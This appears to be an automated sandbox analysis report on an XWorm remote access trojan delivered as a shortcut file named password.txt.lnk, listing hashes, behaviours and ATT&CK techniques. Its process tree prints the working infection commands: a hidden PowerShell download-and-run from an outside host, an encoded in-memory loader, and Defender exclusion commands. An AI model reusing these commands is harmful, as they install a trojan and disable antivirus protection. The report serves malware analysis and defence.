xworm | 3488fe12c3493039d9eddabf5fb04bf9bb3a54bcd591ab911857b602c85f2e66

Analysis

max time kernel
289s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16/05/2024, 09:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

password.txt.lnk
Size

1KB
MD5

a8d941db4a8f2301c661abff9d0121fa
SHA1

df5ccb18e15bea95a0b9588cf113e4219b15fe22
SHA256

3488fe12c3493039d9eddabf5fb04bf9bb3a54bcd591ab911857b602c85f2e66
SHA512

1f945f0ffea07dae942cc218ea603d9e8a21921513380c71c6a8b81ec88a6d955f4dd8ef6ac966248c0983872ef6e9fd88d866e1387fedb72e77b12c437eed2c

Score

10^/10

xworm execution rat trojan

Malware Config

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1464-112-0x0000000000CC0000-0x0000000000CD2000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	208	powershell.exe
6	3700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
208	powershell.exe
3700	powershell.exe
2208	powershell.exe
4156	powershell.exe
208	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1464	RegAAsm.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
208	powershell.exe
208	powershell.exe
208	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
2208	powershell.exe
2208	powershell.exe
2208	powershell.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	1464	RegAAsm.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeIncreaseQuotaPrivilege	2208	powershell.exe
Token: SeSecurityPrivilege	2208	powershell.exe
Token: SeTakeOwnershipPrivilege	2208	powershell.exe
Token: SeLoadDriverPrivilege	2208	powershell.exe
Token: SeSystemProfilePrivilege	2208	powershell.exe
Token: SeSystemtimePrivilege	2208	powershell.exe
Token: SeProfSingleProcessPrivilege	2208	powershell.exe
Token: SeIncBasePriorityPrivilege	2208	powershell.exe
Token: SeCreatePagefilePrivilege	2208	powershell.exe
Token: SeBackupPrivilege	2208	powershell.exe
Token: SeRestorePrivilege	2208	powershell.exe
Token: SeShutdownPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeSystemEnvironmentPrivilege	2208	powershell.exe
Token: SeRemoteShutdownPrivilege	2208	powershell.exe
Token: SeUndockPrivilege	2208	powershell.exe
Token: SeManageVolumePrivilege	2208	powershell.exe
Token: 33	2208	powershell.exe
Token: 34	2208	powershell.exe
Token: 35	2208	powershell.exe
Token: 36	2208	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeIncreaseQuotaPrivilege	4156	powershell.exe
Token: SeSecurityPrivilege	4156	powershell.exe
Token: SeTakeOwnershipPrivilege	4156	powershell.exe
Token: SeLoadDriverPrivilege	4156	powershell.exe
Token: SeSystemProfilePrivilege	4156	powershell.exe
Token: SeSystemtimePrivilege	4156	powershell.exe
Token: SeProfSingleProcessPrivilege	4156	powershell.exe
Token: SeIncBasePriorityPrivilege	4156	powershell.exe
Token: SeCreatePagefilePrivilege	4156	powershell.exe
Token: SeBackupPrivilege	4156	powershell.exe
Token: SeRestorePrivilege	4156	powershell.exe
Token: SeShutdownPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeSystemEnvironmentPrivilege	4156	powershell.exe
Token: SeRemoteShutdownPrivilege	4156	powershell.exe
Token: SeUndockPrivilege	4156	powershell.exe
Token: SeManageVolumePrivilege	4156	powershell.exe
Token: 33	4156	powershell.exe
Token: 34	4156	powershell.exe
Token: 35	4156	powershell.exe
Token: 36	4156	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 5080 wrote to memory of 212	5080	cmd.exe	74
PID 5080 wrote to memory of 212	5080	cmd.exe	74
PID 212 wrote to memory of 208	212	cmd.exe	75
PID 212 wrote to memory of 208	212	cmd.exe	75
PID 208 wrote to memory of 1672	208	powershell.exe	77
PID 208 wrote to memory of 1672	208	powershell.exe	77
PID 1672 wrote to memory of 3700	1672	WScript.exe	78
PID 1672 wrote to memory of 3700	1672	WScript.exe	78
PID 3700 wrote to memory of 1464	3700	powershell.exe	80
PID 3700 wrote to memory of 1464	3700	powershell.exe	80
PID 1464 wrote to memory of 2208	1464	RegAAsm.exe	81
PID 1464 wrote to memory of 2208	1464	RegAAsm.exe	81
PID 1464 wrote to memory of 4156	1464	RegAAsm.exe	84
PID 1464 wrote to memory of 4156	1464	RegAAsm.exe	84

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:5080
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min powershell -windowstyle hidden -command "& {Invoke-WebRequest -Uri http://dvaverif.ru:3001/www/shared.vbs -OutFile C:\Users\Admin\AppData\Local\Temp\shared.vbs; Start-Process 'C:\Users\Admin\AppData\Local\Temp\shared.vbs'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "& {Invoke-WebRequest -Uri http://dvaverif.ru:3001/www/shared.vbs -OutFile C:\Users\Admin\AppData\Local\Temp\shared.vbs; Start-Process 'C:\Users\Admin\AppData\Local\Temp\shared.vbs'}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\shared.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAGEAeQBsAG8AYQBkAFwAKQAuAFAAYQB5AGwAbwBhAGQAKQA7ACAAJAB0AGUAeAB0ACAAPQAgAC0AagBvAGkAbgAgACQAdABlAHgAdABbAC0AMQAuAC4ALQAkAHQAZQB4AHQALgBMAGUAbgBnAHQAaABdADsAIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAZQB4AHQAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABOAHUAbABsACwAJABOAHUAbABsACkAOwA=
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegAAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4180fc1109043ba70ff0e5ff26a9e1f8

SHA1
799702b71147d7a5e8f1b71714a2b859909767d2

SHA256
e1e2f4279d95c9f895c364e055769f17a9aefbb12e34cdebbefb9d345adc4836

SHA512
fb74451d2dc999cf2db3e458ba98c272125a086c3b9561400a182221d1678485f4a8a41521ccf954706772c6f68fcbf41774aa446ff66044da42477bfc284364

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
19be98d0bca2746bc639f43c721bb442

SHA1
06060214e0ee06f27bd6ce6ed0c6fdd60bbcda83

SHA256
e811f273916625bd1478edbc8e6831e5fc5ec6996124d3259267bc69dd7bf69f

SHA512
c9a7e5735feeef4addb9c55a68a4be310f9e5c3fdb8c6d38438cda149dbc4377113855c4f7cf528da9fc6e0b17e4ede35c442fbfef56dd2cf71d1adbe4fadb3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
49aa02844285ffe9532514c6150f4799

SHA1
de8d34b1c595618c187a4815422747a37873677b

SHA256
aff9f4311070e549820dda26660921b40f2691e3c3c9671781134c3b675ade3f

SHA512
354723db596f9f529945478493eec063ba508713a7499e9559e13bcce8793cde13fbebe1708f5e079be8f01557cd2a247fcce9a6a16425ed2622205ce5c656e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe

Filesize
236KB

MD5
7f23b18896c52fa40ad0d9b388e6e951

SHA1
de043868063b6bf974fcadba147d780f072f1840

SHA256
4953d68d68bf137417321bbfc3b7207ee6b2eab0c9600be88bdd3501961ea137

SHA512
33d2f5538678d242490315d9fd622d3a7cd27e82547f7301e1a39780fe1503607fe34a82364115da3a390146dec026d63d8aa5ae5e367c78d5530f9068ea28f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_odu5uxnr.dok.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\shared.vbs

Filesize
448KB

MD5
4bb6f5622adba802d68a53276530db9b

SHA1
a9d6bc4c5e6e989c0e20532b19a28f7c204cf2d6

SHA256
b65cfc8ad99106bf1245ef483be34205f4a8daadc6f14bc0efc8f537b6ffbabd

SHA512
a8c2cee5d492e8e78dbbe7014252b604aac849d546169c5cf1b4f7892b57ee0a8be9ec2c615e51c16d1ead780128addbb8dd2885f3f0619eaa266325f3b60def

Download Submit
memory/208-13-0x00007FF872340000-0x00007FF872D2C000-memory.dmp

Filesize
9.9MB

Download
memory/208-29-0x00007FF872340000-0x00007FF872D2C000-memory.dmp

Filesize
9.9MB

Download
memory/208-48-0x00007FF872340000-0x00007FF872D2C000-memory.dmp

Filesize
9.9MB

Download
memory/208-12-0x0000027F00460000-0x0000027F004D6000-memory.dmp

Filesize
472KB

Download
memory/208-4-0x00007FF872343000-0x00007FF872344000-memory.dmp

Filesize
4KB

Download
memory/208-24-0x00007FF872340000-0x00007FF872D2C000-memory.dmp

Filesize
9.9MB

Download
memory/208-7-0x0000027F000B0000-0x0000027F000D2000-memory.dmp

Filesize
136KB

Download
memory/1464-105-0x00000000003D0000-0x0000000000412000-memory.dmp

Filesize
264KB

Download
memory/1464-111-0x0000000000CA0000-0x0000000000CA6000-memory.dmp

Filesize
24KB

Download
memory/1464-112-0x0000000000CC0000-0x0000000000CD2000-memory.dmp

Filesize
72KB

Download
memory/1464-110-0x00000000025A0000-0x00000000025EC000-memory.dmp

Filesize
304KB

Download
memory/3700-80-0x00000280DB650000-0x00000280DB68C000-memory.dmp

Filesize
240KB

Download
memory/3700-95-0x00000280DB620000-0x00000280DB644000-memory.dmp

Filesize
144KB

Download